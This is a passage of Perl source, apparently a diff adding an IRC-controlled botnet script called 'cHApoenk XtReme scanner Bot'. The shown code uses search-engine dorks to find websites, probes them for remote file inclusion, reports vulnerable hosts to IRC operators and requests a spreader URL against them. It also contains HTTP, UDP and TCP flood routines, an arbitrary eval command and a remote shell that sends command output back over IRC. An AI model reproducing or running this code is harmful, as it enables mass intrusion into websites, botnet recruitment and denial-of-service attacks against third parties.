$req=HTTP::Request->new(GET=>$test); +my $ua=LWP::UserAgent->new(); +$ua->timeout(5); +my $response=$ua->request($req); +if ($response->is_success) { +my $re=$response->content; +if($re =~ /MrNETi/ && $re =~ /uid=/){ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ + sendraw($IRC_cur_socket, "PRIVMSG KoRn :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +elsif($re =~ /MrNETi/) +{ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :4SafemMode ON -5>>> (12+Vuln:5 $print 12+)"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +}}} +exit; +}} + +###################################################################### +#################### Yahoo +###################################################################### +if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){ +if (my $pid = fork) { +waitpid($pid, 0); +} else { +if (fork) { +exit; +} else { +my $bug=$1; +my $dork=$2; +my $contatore=0; +my %hosts; +# Starting The Search Engine + my @ylist=&yahoo($dork); + my @yalist=&yahooa($dork); + my @yblist=&yahoob($dork); + my @yclist=&yahooc($dork); + my @ydlist=&yahood($dork); + push(my @yahoobypass, @ylist, @yalist, @yblist, @yclist, @ydlist ); +# +push(my @tot, @yahoobypass); +my @puliti=&unici(@tot); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4+Yahoo4+ Total:14 ".scalar(@tot)." Cleaned:14 ".scalar(@puliti)." for4 $dork "); +my $uni=scalar(@puliti); +foreach my $sito (@puliti) +{ +$contatore++; +if ($contatore %100==0){ +} +if ($contatore==$uni-1){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :4+Yahoo4+ finished for14 $dork"); +} +### Print CMD and TEST CMD### +my $test="http://".$sito.$bug.$id."?"; +my $print="http://".$sito.$bug.$cmd."?"; +### End of Print CMD and TEST CMD### +my $req=HTTP::Request->new(GET=>$test); +my $ua=LWP::UserAgent->new(); +$ua->timeout(5); +my $response=$ua->request($req); +if ($response->is_success) { +my $re=$response->content; +if($re =~ /MrNETi/ && $re =~ /uid=/){ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ + sendraw($IRC_cur_socket, "PRIVMSG KoRn :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +elsif($re =~ /MrNETi/) +{ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :4SafeMode ON -5>>> (12+Vuln:5 $print 12+)"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +}}} +exit; +}} + +###################################################################### +#################### MSN +###################################################################### +if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){ +if (my $pid = fork) { +waitpid($pid, 0); +} else { +if (fork) { +exit; +} else { +my $bug=$1; +my $dork=$2; +my $contatore=0; +my %hosts; +# Starting The Search Engine + my @mlist=&msn($dork); +push(my @tot, @mlist); +my @puliti=&unici(@tot); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4+MSN4+ Total:14 ".scalar(@tot)." Cleaned:14 ".scalar(@puliti)." for4 $dork "); +my $uni=scalar(@puliti); +foreach my $sito (@puliti) +{ +$contatore++; +if ($contatore %100==0){ +} +if ($contatore==$uni-1){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :4+MSN4+ finished for14 $dork"); +} +### Print CMD and TEST CMD### +my $test="http://".$sito.$bug.$id."?"; +my $print="http://".$sito.$bug.$cmd."?"; +### End of Print CMD and TEST CMD### +my $req=HTTP::Request->new(GET=>$test); +my $ua=LWP::UserAgent->new(); +$ua->timeout(5); +my $response=$ua->request($req); +if ($response->is_success) { +my $re=$response->content; +if($re =~ /MrNETi/ && $re =~ /uid=/){ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ + sendraw($IRC_cur_socket, "PRIVMSG KoRn :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +elsif($re =~ /MrNETi/) +{ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :4SafeMode ON -5>>> (12+Vuln:5 $print 12+)"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +}}} +exit; +}} + +###################################################################### +#################### SEARCH +###################################################################### +if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){ +if (my $pid = fork) { +waitpid($pid, 0); +} else { +if (fork) { +exit; +} else { +my $bug=$1; +my $dork=$2; +my $contatore=0; +my %hosts; +# Starting The Search Engine + my @slist=&search($dork); +push(my @tot, @slist); +my @puliti=&unici(@tot); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4+Search4+ Total:14 ".scalar(@tot)." Cleaned:14 ".scalar(@puliti)." for4 $dork "); +my $uni=scalar(@puliti); +foreach my $sito (@puliti) +{ +$contatore++; +if ($contatore %100==0){ +} +if ($contatore==$uni-1){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :4+Search4+ finished for14 $dork"); +} +### Print CMD and TEST CMD### +my $test="http://".$sito.$bug.$id."?"; +my $print="http://".$sito.$bug.$cmd."?"; +### End of Print CMD and TEST CMD### +my $req=HTTP::Request->new(GET=>$test); +my $ua=LWP::UserAgent->new(); +$ua->timeout(5); +my $response=$ua->request($req); +if ($response->is_success) { +my $re=$response->content; +if($re =~ /MrNETi/ && $re =~ /uid=/){ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ + sendraw($IRC_cur_socket, "PRIVMSG KoRn :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +elsif($re =~ /MrNETi/) +{ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :4SafeMode ON -5>>> (12+Vuln:5 $print 12+)"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +}}} +exit; +}} + +###################################################################### +#################### FireBall +###################################################################### +if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){ +if (my $pid = fork) { +waitpid($pid, 0); +} else { +if (fork) { +exit; +} else { +my $bug=$1; +my $dork=$2; +my $contatore=0; +my %hosts; +# Starting The Search Engine + my @fireball=fireball($dork); +push(my @tot, @fireball); +my @puliti=&unici(@tot); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4+FireBall4+ Total:14 ".scalar(@tot)." Cleaned:14 ".scalar(@puliti)." for4 $dork "); +my $uni=scalar(@puliti); +foreach my $sito (@puliti) +{ +$contatore++; +if ($contatore %100==0){ +} +if ($contatore==$uni-1){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :4+FireBall4+ finished for14 $dork"); +} +### Print CMD and TEST CMD### +my $test="http://".$sito.$bug.$id."?"; +my $print="http://".$sito.$bug.$cmd."?"; +### End of Print CMD and TEST CMD### +my $req=HTTP::Request->new(GET=>$test); +my $ua=LWP::UserAgent->new(); +$ua->timeout(5); +my $response=$ua->request($req); +if ($response->is_success) { +my $re=$response->content; +if($re =~ /MrNETi/ && $re =~ /uid=/){ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ + sendraw($IRC_cur_socket, "PRIVMSG KoRn :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +elsif($re =~ /MrNETi/) +{ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :4SafeMode ON -5>>> (12+Vuln:5 $print 12+)"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +}}} +exit; +}} + +###################################################################### +#################### UOL +###################################################################### +if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){ +if (my $pid = fork) { +waitpid($pid, 0); +} else { +if (fork) { +exit; +} else { +my $bug=$1; +my $dork=$2; +my $contatore=0; +my %hosts; +# Starting The Search Engine + my @ulist=&uol($dork); +push(my @tot, @ulist); +my @puliti=&unici(@tot); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4+UOL4+ Total:14 ".scalar(@tot)." Cleaned:14 ".scalar(@puliti)." for4 $dork "); +my $uni=scalar(@puliti); +foreach my $sito (@puliti) +{ +$contatore++; +if ($contatore %100==0){ +} +if ($contatore==$uni-1){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :4+UOL4+ finished for14 $dork"); +} +### Print CMD and TEST CMD### +my $test="http://".$sito.$bug.$id."?"; +my $print="http://".$sito.$bug.$cmd."?"; +### End of Print CMD and TEST CMD### +my $req=HTTP::Request->new(GET=>$test); +my $ua=LWP::UserAgent->new(); +$ua->timeout(5); +my $response=$ua->request($req); +if ($response->is_success) { +my $re=$response->content; +if($re =~ /MrNETi/ && $re =~ /uid=/){ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ + sendraw($IRC_cur_socket, "PRIVMSG KoRn :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +elsif($re =~ /MrNETi/) +{ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :4SafeMode ON -5>>> (12+Vuln:5 $print 12+)"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +}}} +exit; +}} + +###################################################################### +#################### ALTAVISTA +###################################################################### +if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){ +if (my $pid = fork) { +waitpid($pid, 0); +} else { +if (fork) { +exit; +} else { +my $bug=$1; +my $dork=$2; +my $contatore=0; +my %hosts; +# Starting The Search Engine + my @alist=&altavista($dork); + my @ablist=&altavistade($dork); + my @aclist=&altavistaus($dork); +push(my @tot, @alist,@ablist,@aclist); +my @puliti=&unici(@tot); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4+Altavista4+ Total:14 ".scalar(@tot)." Cleaned:14 ".scalar(@puliti)." for4 $dork "); +my $uni=scalar(@puliti); +foreach my $sito (@puliti) +{ +$contatore++; +if ($contatore %100==0){ +} +if ($contatore==$uni-1){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :4+Altavista4+ finished for14 $dork"); +} +### Print CMD and TEST CMD### +my $test="http://".$sito.$bug.$id."?"; +my $print="http://".$sito.$bug.$cmd."?"; +### End of Print CMD and TEST CMD### +my $req=HTTP::Request->new(GET=>$test); +my $ua=LWP::UserAgent->new(); +$ua->timeout(5); +my $response=$ua->request($req); +if ($response->is_success) { +my $re=$response->content; +if($re =~ /MrNETi/ && $re =~ /uid=/){ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ + sendraw($IRC_cur_socket, "PRIVMSG KoRn :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +elsif($re =~ /MrNETi/) +{ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :4SafeMode ON -5>>> (12+Vuln:5 $print 12+)"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +}}} +exit; +}} + +###################################################################### +#################### HOTBOT +###################################################################### +if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){ +if (my $pid = fork) { +waitpid($pid, 0); +} else { +if (fork) { +exit; +} else { +my $bug=$1; +my $dork=$2; +my $contatore=0; +my %hosts; +# Starting The Search Engine + my @hlist=&hotbot($dork); +push(my @tot, @hlist); +my @puliti=&unici(@tot); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4+HotBot4+ Total:14 ".scalar(@tot)." Cleaned:14 ".scalar(@puliti)." for4 $dork "); +my $uni=scalar(@puliti); +foreach my $sito (@puliti) +{ +$contatore++; +if ($contatore %100==0){ +} +if ($contatore==$uni-1){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :4+HotBot4+ finished for14 $dork"); +} +### Print CMD and TEST CMD### +my $test="http://".$sito.$bug.$id."?"; +my $print="http://".$sito.$bug.$cmd."?"; +### End of Print CMD and TEST CMD### +my $req=HTTP::Request->new(GET=>$test); +my $ua=LWP::UserAgent->new(); +$ua->timeout(5); +my $response=$ua->request($req); +if ($response->is_success) { +my $re=$response->content; +if($re =~ /MrNETi/ && $re =~ /uid=/){ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ + sendraw($IRC_cur_socket, "PRIVMSG KoRn :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +elsif($re =~ /MrNETi/) +{ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :4SafeMode ON -5>>> (12+Vuln:5 $print 12+)"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +}}} +exit; +}} + +###################################################################### +#################### MAMMA +###################################################################### +if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){ +if (my $pid = fork) { +waitpid($pid, 0); +} else { +if (fork) { +exit; +} else { +my $bug=$1; +my $dork=$2; +my $contatore=0; +my %hosts; +# Starting The Search Engine + my @malist=&mamma($dork); +push(my @tot, @malist); +my @puliti=&unici(@tot); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4+Mamma4+ Total:14 ".scalar(@tot)." Cleaned:14 ".scalar(@puliti)." for4 $dork "); +my $uni=scalar(@puliti); +foreach my $sito (@puliti) +{ +$contatore++; +if ($contatore %100==0){ +} +if ($contatore==$uni-1){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :4+Mamma4+ finished for14 $dork"); +} +### Print CMD and TEST CMD### +my $test="http://".$sito.$bug.$id."?"; +my $print="http://".$sito.$bug.$cmd."?"; +### End of Print CMD and TEST CMD### +my $req=HTTP::Request->new(GET=>$test); +my $ua=LWP::UserAgent->new(); +$ua->timeout(5); +my $response=$ua->request($req); +if ($response->is_success) { +my $re=$response->content; +if($re =~ /MrNETi/ && $re =~ /uid=/){ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ + sendraw($IRC_cur_socket, "PRIVMSG KoRn :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +elsif($re =~ /MrNETi/) +{ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :4SafeMode ON -5>>> (12+Vuln:5 $print 12+)"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +}}} +exit; +}} + +###################################################################### +#################### MOZBOT +###################################################################### +if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){ +if (my $pid = fork) { +waitpid($pid, 0); +} else { +if (fork) { +exit; +} else { +my $bug=$1; +my $dork=$2; +my $contatore=0; +my %hosts; +# Starting The Search Engine + my @mozlist=&mozbot($dork); +push(my @tot, @mozlist); +my @puliti=&unici(@tot); + sendraw($IRC_cur_socket, "PRIVMSG $printl :4+MozBot4+ Total:14 ".scalar(@tot)." Cleaned:14 ".scalar(@puliti)." for4 $dork "); +my $uni=scalar(@puliti); +foreach my $sito (@puliti) +{ +$contatore++; +if ($contatore %100==0){ +} +if ($contatore==$uni-1){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :4+MozBot4+ finished for14 $dork"); +} +### Print CMD and TEST CMD### +my $test="http://".$sito.$bug.$id."?"; +my $print="http://".$sito.$bug.$cmd."?"; +### End of Print CMD and TEST CMD### +my $req=HTTP::Request->new(GET=>$test); +my $ua=LWP::UserAgent->new(); +$ua->timeout(5); +my $response=$ua->request($req); +if ($response->is_success) { +my $re=$response->content; +if($re =~ /MrNETi/ && $re =~ /uid=/){ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ + sendraw($IRC_cur_socket, "PRIVMSG KoRn :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :(12+SafeMode:4OFF12+) (12+Vuln:7 $print 12+)"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +elsif($re =~ /MrNETi/) +{ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :4SafeMode ON -5>>> (12+Vuln:5 $print 12+)"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +}}} +exit; +}} + +###################### +#End of EXTREMEscanNER# +# # +###################### +# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.% +# % cHApoenk XtReme scanner Bot % +# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.% +###################### +# HTTPFlood # +# # +###################### +if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) { +sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+HttpKill4+) Attacking 4 ".$1." on port 80 for 4 ".$2." seconds ."); +my $itime = time; +my ($cur_time); +$cur_time = time - $itime; +while ($2>$cur_time){ +$cur_time = time - $itime; +my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80); +print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n"; +close($socket); +} +sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+HttpKill4+) Attacking done 4 ".$1."."); +} +###################### +# End of HTTPFlood # +# # +###################### +# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.% +# % cHApoenk XtReme scanner Bot % +# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.% +###################### +# UDPFlood # +# # +###################### +if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) { +sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+HttpKill4+) Attacking4 ".$1." with 4 ".$2." Kb Packets for 4 ".$3." seconds."); +my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3"); +$dtime = 1 if $dtime == 0; +my %bytes; +$bytes{igmp} = $2 * $pacotes{igmp}; +$bytes{icmp} = $2 * $pacotes{icmp}; +$bytes{o} = $2 * $pacotes{o}; +$bytes{udp} = $2 * $pacotes{udp}; +$bytes{tcp} = $2 * $pacotes{tcp}; +sendraw($IRC_cur_socket, "PRIVMSG $printl :(4+HttpKill4+) Results4 ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." Kb in4 ".$dtime." seconds to4 ".$1."."); +} +exit; +} +} +###################### +# End of Udpflood # +# # +###################### + + +sub ircase { +my ($kem, $printl, $case) = @_; + if ($case =~ /^join (.*)/) { + j("$1"); + } + if ($case =~ /^part (.*)/) { + p("$1"); + } +if ($case =~ /^rejoin\s+(.*)/) { +my $chan = $1; +if ($chan =~ /^(\d+) (.*)/) { +for (my $ca = 1; $ca <= $1; $ca++ ) { +p("$2"); +j("$2"); +} +} +else { +p("$chan"); +j("$chan"); +} +} + +if ($case =~ /^op/) { +op("$printl", "$kem") if $case eq "op"; +my $oarg = substr($case, 3); +op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/); +} + +if ($case =~ /^deop/) { +deop("$printl", "$kem") if $case eq "deop"; +my $oarg = substr($case, 5); +deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/); +} + +if ($case =~ /^msg\s+(\S+) (.*)/) { +msg("$1", "$2"); +} + +if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) { +for (my $cf = 1; $cf <= $1; $cf++) { +msg("$2", "$3"); +} +} + +if ($case =~ /^ctcp\s+(\S+) (.*)/) { +ctcp("$1", "$2"); +} + +if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) { +for (my $cf = 1; $cf <= $1; $cf++) { +ctcp("$2", "$3"); +} +} + +if ($case =~ /^nick (.*)/) { +nick("$1"); +} + +if ($case =~ /^connect\s+(\S+)\s+(\S+)/) { +conectar("$2", "$1", 6667); +} + +if ($case =~ /^raw (.*)/) { +sendraw("$1"); +} + +if ($case =~ /^eval (.*)/) { +eval "$1"; +} +} + + +sub shell { +my $printl=$_[0]; +my $comando=$_[1]; +if ($comando =~ /cd (.*)/) { +chdir("$1") || msg("$printl", "No such file or directory"); +return; +} + +elsif ($pid = fork) { +waitpid($pid, 0); +} +else { +if (fork) { +exit; + +} else { +my @resp=`$comando 2>&1 3>&1`; +my $c=0; +foreach my $linha (@resp) { + $c++; + chop $linha; + sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha"); + if ($c == "$linas_max") { + $c=0; + sleep $sleep; + } +} +exit; +} +} +} + +sub tcpflooder { +my $itime = time; +my ($cur_time); +my ($ia,$pa,$proto,$j,$l,$t); +$ia=inet_aton($_[0]); +$pa=sockaddr_in($_[1],$ia); +$ftime=$_[2]; +$proto=getprotobyname('tcp'); +$j=0;$l=0; +$cur_time = time - $itime; +while ($l<1000){ +$cur_time = time - $itime; +last if $cur_time >= $ftime; +$t="SOCK$l"; +socket($t,PF_INET,SOCK_STREAM,$proto); +connect($t,$pa)||$j--; +$j++;$l++; +} +$l=0; +while ($l<1000){ +$cur_time = time - $itime; +last if $cur_time >= $ftime; +$t="SOCK$l"; +shutdown($t,2); +$l++; +} +} + +# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.% +# % cHApoenk XtReme scanner Bot % +# %.%.%.%.%.%.%.%.%.%.%.%.%.%.%.% + +sub udpflooder { +my $iaddr = inet_aton($_[0]); +my $msg = 'A' x $_[1]; +my $ftime = $_[2]; +my $cp = 0; +my (%pacotes); +$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0; +socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++; +socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++; +socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++; +socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++; +return(undef) if $cp == 4; +my $itime = time; +my ($cur_time); +while ( 1 ) { +for (my $porta = 1; +$porta <= 65000; $porta++) { +$cur_time = time - $itime; +last if $cur_time >= $ftime; +send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++; +send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++; +send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++; +send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++; + + +for (my $pc = 3; +$pc <= 255;$pc++) { +next if $pc == 6; +$cur_time = time - $itime; +last if $cur_time >= $ftime; +socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next; +send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++; +} +} +last if $cur_time >= $ftime; +} +return($cur_time, %pacotes); +} + +sub ctcp { +return unless $#_ == 1; +sendraw("PRIVMSG $_[0] :\001$_[1]\001"); +} + +sub msg { +return unless $#_ == 1; +sendraw("PRIVMSG $_[0] :$_[1]"); +} + +sub notice { +return unless $#_ == 1; +sendraw("NOTICE $_[0] :$_[1]"); +} + +sub op { +return unless $#_ == 1; +sendraw("MODE $_[0] +o $_[1]"); +} + +sub deop { +return unless $#_ == 1; +sendraw("MODE $_[0] -o $_[1]"); +} + +sub j { +&join(@_); +} + +sub join { +return unless $#_ == 0; +sendraw("JOIN $_[0]"); + +} +sub p { part(@_); +} + +sub part { +sendraw("PART $_[0]"); +} + +sub nick { +return unless $#_ == 0; +sendraw("NICK $_[0]"); +} + +sub quit { +sendraw("QUIT :$_[0]"); +} + +##### +# SUBS GOOGLE +##### +sub googlet { +my @dominios = ("ae","com.ar","at","com.au","be","com.br","ca","ch","cl","de","dk"); +my @country = ("AE","AR","AT","AU","BE","BR","CA","CH","CL","DE","DK"); +my @lang = ("en","es","de","nl","pt-BR","it","de","fo","sv","fr","el"); +my @lst; +my $key=key($_[0]); +my $c=0; +foreach my $i (@dominios){ +my @lista = google($i,$key,$lang[$c],$country[$c]); +push(@lst,@lista); +$c++; +} +return @lst; +} + +sub google(){ +my @lst; +my $i=$_[0]; +my $key=$_[1]; +my $lang= $_[2]; +my $country =$_[3]; +for($b=0;$b<=5000;$b+=100){ +my $Go=("www.google.".$i."/search?hl=".$lang."&q=".key($key)."&num=100&start=".$b."&meta=cr%3Dcountry".$country); +my $Res=query($Go); +while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){ +if ($1 !~ /google/){ +my $k=$1; +my @grep=links($k); +push(@lst,@grep); +}}} +return @lst; +} + +##### +# SUBS AllTheWeb +##### + +sub allthewebt { +my @lang = ("en","es","de","nl","pt-BR","it","de","fo"); +my @lst; +my $key=key($_[0]); +my $c=0; +foreach my $lang (@lang){ +my @lista = alltheweb($key,$lang[$c]); +push(@lst,@lista); +$c++; +} +return @lst; +} + + +sub alltheweb(){ +my @lista; +my $key = $_[0]; +my $lang= $_[1]; +for($b=0;$b<=500;$b+=100){ +my $alltheweb=("http://www.alltheweb.com/search?cat=web&_sb_lang=".$lang."&hits=100&q=".key($key)."&o=".$b); +my $Res=query($alltheweb); +while($Res =~ m/<span class=\"?resURL\"?>http:\/\/(.+?)\<\/span>/g){ +my $k=$1; +$k=~s/ //g; +my @grep=links($k); +push(@lst,@grep); +}} +return @lst; +} + +sub standard() +{ +my @lst; +my $key=$_[0]; +my $i=0; +my $pg=0; +for($i=0; $i<=1000; $i+=100) +{ +my $all=("http://www.alltheweb.com/search?cat=web&_sb_lang=any&hits=100&q=".key($key)."&o=".$i); +my $Res=query($all); +while($Res =~ m/<span class=\"?resURL\"?>http:\/\/(.+?)\<\/span>/g){ +my $k=$1; +$k=~s/ //g; +my @grep=links($k); +push(@lst,@grep); +}} +return @lst; +} + +##### +# SUBS Lycos +##### +sub lycos(){ +my @lst; +my $key = $_[0]; +for($b=0;$b<=1000;$b+=100){ +my $ly=("http://search.lycos.com/?query=".key($key)."&page=$av".$b); +my $Res=query($ly); +while($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){ +if ($1 !~ /msn|live|google|yahoo/){ +my $k=$1; +my 